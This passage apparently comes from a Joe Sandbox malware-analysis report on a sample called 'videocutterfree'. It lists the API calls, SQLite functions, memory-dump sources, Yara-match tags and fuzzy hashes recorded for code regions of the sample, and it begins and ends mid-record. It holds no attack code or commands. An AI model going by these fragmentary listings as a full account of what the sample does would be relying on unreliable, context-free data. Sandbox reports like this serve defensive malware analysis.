                                                                              • RtlDecodePointer.NTDLL(009A2260), ref: 009A238D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00000029,F3247817,?,?,?,?,00000000,009B5868,000000FF,009A0F7A), ref: 009A0D1A
                                                                              • TlsSetValue.KERNEL32(00000029,009A0F7A,?,?,00000000), ref: 009A0D87
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0DB1
                                                                              • HeapFree.KERNEL32(00000000), ref: 009A0DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapValue$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 1812714009-0
                                                                              APIs
                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 009B4540
                                                                              • __FindPESection.LIBCMT ref: 009B455A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                              • String ID:
                                                                              • API String ID: 876702719-0
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405D53
                                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405D6D
                                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DA1
                                                                              • MultiByteToWideChar.KERNEL32(00405395,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DD9
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E2F
                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E41
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3852931651-0
                                                                              APIs
                                                                              • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                              • sqlite3_log.SQLITE3 ref: 609498F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                              • String ID: List of tree roots: $d$|
                                                                              • API String ID: 3709608969-1164703836
                                                                              • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                              • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                              • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                              • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00991CB1
                                                                              • CloseHandle.KERNEL32(?), ref: 00991CBA
                                                                              • InterlockedExchangeAdd.KERNEL32(009C6244,00000000), ref: 00991CC6
                                                                              • TerminateThread.KERNEL32(?,00000000), ref: 00991CD4
                                                                              • QueueUserAPC.KERNEL32(00991E7C,?,00000000), ref: 00991CE1
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00991CEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1946104331-0
                                                                              • Opcode ID: b0deaa41f8a0657f951840153ab27cca03640370f7618018272b6b8a4fb0a007
                                                                              • Instruction ID: bfbd53aade05b2dd82876b49d49731c9158bd5f33944163fb3f2683bc057d1db
                                                                              • Opcode Fuzzy Hash: b0deaa41f8a0657f951840153ab27cca03640370f7618018272b6b8a4fb0a007
                                                                              • Instruction Fuzzy Hash: 0CF03C36528215AF9B206B9BDE0DD6BBBBCEB85721700431DF56A821A0DB74B8009B61
                                                                              APIs
                                                                                • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                              • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                              • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                              • sqlite3_free.SQLITE3 ref: 6096029A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                              • String ID: e
                                                                              • API String ID: 786425071-4024072794
                                                                              • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                              • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                              • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                              • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32 ref: 00403AB7
                                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403AEC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403B4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                              • API String ID: 1385375860-4131005785
                                                                              • Opcode ID: 344249156d110f257b02153e948bbfede2cc9a013a446afb0f69aff2e88163ae
                                                                              • Instruction ID: b9aee79e7de5a56590922bde38e4698e080472a703040a0c31cb791c8daf1122
                                                                              • Opcode Fuzzy Hash: 344249156d110f257b02153e948bbfede2cc9a013a446afb0f69aff2e88163ae
                                                                              • Instruction Fuzzy Hash: EC31E371A512886DEB319A705C45AAA3F7C9B0270DF1440FBD086F52C3E239AB858B29
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_exec
                                                                              • String ID: sqlite_master$sqlite_temp_master$|
                                                                              • API String ID: 2141490097-2247242311
                                                                              • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                              • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                              • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                              • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 009A072F
                                                                                • Part of subcall function 009A1283: std::exception::_Copy_str.LIBCMT ref: 009A129C
                                                                                • Part of subcall function 0099FB00: __CxxThrowException@8.LIBCMT ref: 0099FB5E
                                                                              • std::exception::exception.LIBCMT ref: 009A078E
                                                                              Strings
                                                                              • boost unique_lock owns already the mutex, xrefs: 009A077D
                                                                              • $, xrefs: 009A0793
                                                                              • boost unique_lock has no mutex, xrefs: 009A071E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                              • API String ID: 2140441600-46888669
                                                                              • Opcode ID: 0c25f1de33fd6ecdeaa310044b722a6273e904094d8a89e51b9a464e75cc9397
                                                                              • Instruction ID: a966e4e5454b1c71c8a6b0b4d1675b8ad8ec555ce8f2ab91e844b913af4e9db4
                                                                              • Opcode Fuzzy Hash: 0c25f1de33fd6ecdeaa310044b722a6273e904094d8a89e51b9a464e75cc9397
                                                                              • Instruction Fuzzy Hash: 922106B180C3809FD720DF29C55575BBBE4BBC9718F404A1EF8A587281D7B5D408CB92
                                                                              APIs
                                                                              • __getptd_noexit.LIBCMT ref: 009A3830
                                                                                • Part of subcall function 009A4A22: GetLastError.KERNEL32(75920A60,7591F550,009A4C10,009A1DE3,7591F550,?,009958EA,00000104,75920A60,7591F550,ntdll.dll,?,?,?,00995D00), ref: 009A4A24
                                                                                • Part of subcall function 009A4A22: __calloc_crt.LIBCMT ref: 009A4A45
                                                                                • Part of subcall function 009A4A22: __initptd.LIBCMT ref: 009A4A67
                                                                                • Part of subcall function 009A4A22: GetCurrentThreadId.KERNEL32 ref: 009A4A6E
                                                                                • Part of subcall function 009A4A22: SetLastError.KERNEL32(00000000,009958EA,00000104,75920A60,7591F550,ntdll.dll,?,?,?,00995D00), ref: 009A4A86
                                                                              • __calloc_crt.LIBCMT ref: 009A3853
                                                                              • __get_sys_err_msg.LIBCMT ref: 009A3871
                                                                              • __invoke_watson.LIBCMT ref: 009A388E
                                                                              Strings
                                                                              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 009A383B, 009A3861
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                              • API String ID: 109275364-798102604
                                                                              • Opcode ID: 96c035aef47aae1e660ce74d2f075588948d7d54e5f037e43fbfddade829d910
                                                                              • Instruction ID: 34280554af775964f0c2a542994f816c41b7aceb11f81ca11b830f6d680a28b2
                                                                              • Opcode Fuzzy Hash: 96c035aef47aae1e660ce74d2f075588948d7d54e5f037e43fbfddade829d910
                                                                              • Instruction Fuzzy Hash: C0F0E932A48B1467E732265F5C4166BB2DCDBC37B4F10C53AF945A6502E759DF0002D4
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
                                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
                                                                              • GetLastError.KERNEL32 ref: 0099237A
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID: pqcs
                                                                              • API String ID: 1619523792-2559862021
                                                                              • Opcode ID: 07ee96196047048aa33f3a815aefb6de36c2f6699e1e2bda64732683e5d07704
                                                                              • Instruction ID: 7278b6f5d4333c77d6989764fdd1562811bf70dac6020766760dd1d1637e0b65
                                                                              • Opcode Fuzzy Hash: 07ee96196047048aa33f3a815aefb6de36c2f6699e1e2bda64732683e5d07704
                                                                              • Instruction Fuzzy Hash: 7BF05471914304BFDB20BFBA9D0ABAB7BBCEB44711B004669F806D7150F775E9049791
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994035
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00994042
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00994049
                                                                              • std::exception::exception.LIBCMT ref: 00994063
                                                                                • Part of subcall function 00999479: __EH_prolog.LIBCMT ref: 0099947E
                                                                                • Part of subcall function 00999479: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0099948D
                                                                                • Part of subcall function 00999479: __CxxThrowException@8.LIBCMT ref: 009994AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3112922283-2104205924
                                                                              • Opcode ID: d6e1102d19fd98da8fa4d03b76251269e0f7af395603d29eb600baf080f0ed72
                                                                              • Instruction ID: 0d0d6567973d8509fa4387ab3daa5a3bca767b2aa26042e8f8ba041a2c6d651d
                                                                              • Opcode Fuzzy Hash: d6e1102d19fd98da8fa4d03b76251269e0f7af395603d29eb600baf080f0ed72
                                                                              • Instruction Fuzzy Hash: 64F08CB2D04209EBDF10FFE5DA09BEEBBBCEB44311F004219E915A2192DB7892048B91
                                                                              APIs
                                                                                • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                              • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                              • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                              • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                              • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                              • String ID:
                                                                              • API String ID: 683514883-0
                                                                              • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                              • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                              • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                              • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                              APIs
                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                              • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                              • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 1903298374-0
                                                                              • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                              • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                              • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                              • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403919
                                                                              • GetFileType.KERNEL32(00000800), ref: 004039BF
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403A18
                                                                              • GetFileType.KERNEL32(00000000), ref: 00403A26
                                                                              • SetHandleCount.KERNEL32 ref: 00403A5D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType$CountInfoStartup
                                                                              • String ID:
                                                                              • API String ID: 1710529072-0
                                                                              • Opcode ID: 4510031a8605209d3dfb7fb84fc7b00f8c5fc6461cda088ad20275d2acfb4ccd
                                                                              • Instruction ID: f45e27808e37444d6d61e60d1d2a7dac726cde9b1c4190895e7af2971a6585cb
                                                                              • Opcode Fuzzy Hash: 4510031a8605209d3dfb7fb84fc7b00f8c5fc6461cda088ad20275d2acfb4ccd
                                                                              • Instruction Fuzzy Hash: D95122B16043418BD7209F28CD447663FA8AB01326F1A473AE4E6EB3E1D378CA54C75A
                                                                              APIs
                                                                                • Part of subcall function 009A0800: CloseHandle.KERNEL32(00000000,F3247817), ref: 009A0851
                                                                                • Part of subcall function 009A0800: WaitForSingleObject.KERNEL32(?,000000FF,F3247817,?,?,?,?,F3247817,009A07D3,F3247817), ref: 009A0868
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009A0ACE
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009A0AEE
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 009A0B27
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 009A0B7B
                                                                              • SetEvent.KERNEL32(?), ref: 009A0B82
                                                                                • Part of subcall function 0099418C: CloseHandle.KERNEL32(00000000,?,009A0AB5), ref: 009941B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 4166353394-0
                                                                              • Opcode ID: ccd95d63f0e5269ddf1529ff70f31a44fbfd5f6ebaa15ef5bac09dc33a29e441
                                                                              • Instruction ID: 27cce570b3845b6eb346c9c05fde78a842fd6deaf5b334a50e5e05437f98ad32
                                                                              • Opcode Fuzzy Hash: ccd95d63f0e5269ddf1529ff70f31a44fbfd5f6ebaa15ef5bac09dc33a29e441
                                                                              • Instruction Fuzzy Hash: 6941E1306043019FDF259F28CD81B1777A8EB86338F144668EC18DB2A2D735DC068BE5
                                                                              APIs
                                                                                • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                              • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                              • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                              • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                              • String ID:
                                                                              • API String ID: 1894464702-0
                                                                              • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                              • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                              • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                              • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009920AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009920CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009920D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0099213E
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1611172436-0
                                                                              • Opcode ID: 691f094c9553fcb04969cb104cc9ce1ca9abfc3f334303767016b1c748b5d4e6
                                                                              • Instruction ID: 1c83278adf2bb55a041b52b453ecf8a7ff44e6ba2cc4a937e86b0025f8386fe8
